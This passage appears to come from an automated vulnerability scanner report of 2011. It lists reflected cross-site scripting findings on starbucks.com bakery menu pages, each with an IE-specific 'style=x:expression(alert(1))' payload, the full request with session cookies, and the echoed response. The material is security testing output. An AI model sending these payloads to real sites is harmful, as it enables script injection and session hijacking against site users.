Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:47 GMT
Connection: close
Content-Length: 44496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake?ddfa4"style="x:expression(alert(1))"a47f474673c=1"/>
...[SNIP]...

1.838. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/low-fat-raspberry-sunshine-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef2aa"style="x:expression(alert(1))"36428682d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:01 GMT
Connection: close
Content-Length: 43853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style="x:expression(alert(1))"36428682d89=1"/>
...[SNIP]...

1.839. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/mallorca-sweet-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea7f1"style="x:expression(alert(1))"a7c7d383e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/mallorca-sweet-bread?ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:40 GMT
Connection: close
Content-Length: 44079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread?ea7f1"style="x:expression(alert(1))"a7c7d383e8a=1"/>
...[SNIP]...

1.840. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/maple-oat-pecan-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d84b"style="x:expression(alert(1))"54ee8af6ce1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/maple-oat-pecan-scone?4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:11 GMT
Connection: close
Content-Length: 43961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone?4d84b"style="x:expression(alert(1))"54ee8af6ce1=1"/>
...[SNIP]...

1.841. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marble-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd3db"style="x:expression(alert(1))"604a55d7060 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marble-pound-cake?bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:34 GMT
Connection: close
Content-Length: 43704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marble-pound-cake?bd3db"style="x:expression(alert(1))"604a55d7060=1"/>
...[SNIP]...

1.842. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marshmallow-dream-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d416"style="x:expression(alert(1))"80939aba3c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marshmallow-dream-bar?2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:47 GMT
Connection: close
Content-Length: 43514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar?2d416"style="x:expression(alert(1))"80939aba3c2=1"/>
...[SNIP]...

1.843. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/morning-bun

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e918"style="x:expression(alert(1))"7d0bd106018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/morning-bun?4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:56 GMT
Connection: close
Content-Length: 43247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/morning-bun?4e918"style="x:expression(alert(1))"7d0bd106018=1"/>
...[SNIP]...

1.844. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/multigrain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ba5"style="x:expression(alert(1))"9c913b552b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/multigrain-bagel?34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:23 GMT
Connection: close
Content-Length: 43965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/multigrain-bagel?34ba5"style="x:expression(alert(1))"9c913b552b8=1"/>
...[SNIP]...

1.845. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/old-fashion-glazed-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67354"style="x:expression(alert(1))"1005e24d9c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/old-fashion-glazed-doughnut?67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:27 GMT
Connection: close
Content-Length: 43941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut?67354"style="x:expression(alert(1))"1005e24d9c0=1"/>
...[SNIP]...

1.846. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/outrageous-oatmeal-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffe3f"style="x:expression(alert(1))"3b24c4e3b50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:10 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style="x:expression(alert(1))"3b24c4e3b50=1"/>
...[SNIP]...

1.847. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/petite-vanilla-bean-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8dda"style="x:expression(alert(1))"f64420d0491 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/petite-vanilla-bean-scone?f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:27 GMT
Connection: close
Content-Length: 44106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone?f8dda"style="x:expression(alert(1))"f64420d0491=1"/>
...[SNIP]...

1.848. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/plain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa675"style="x:expression(alert(1))"b649a3a4e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/plain-bagel?aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:19 GMT
Connection: close
Content-Length: 43603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/plain-bagel?aa675"style="x:expression(alert(1))"b649a3a4e01=1"/>
...[SNIP]...

1.849. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/pumpkin-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96de"style="x:expression(alert(1))"ee177beb35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/pumpkin-bread?d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:33 GMT
Connection: close
Content-Length: 43511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/pumpkin-bread?d96de"style="x:expression(alert(1))"ee177beb35c=1"/>
...[SNIP]...

1.850. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/raspberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59168"style%3d"x%3aexpression(alert(1))"e787100da19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59168"style="x:expression(alert(1))"e787100da19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/raspberry-scone?59168"style%3d"x%3aexpression(alert(1))"e787100da19=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:18 GMT
Connection: close
Content-Length: 43778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/raspberry-scone?59168"style="x:expression(alert(1))"e787100da19=1"/>
...[SNIP]...

1.851. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/red-velvet-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abbb"style="x:expression(alert(1))"62d0d1600ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/red-velvet-cupcake?6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
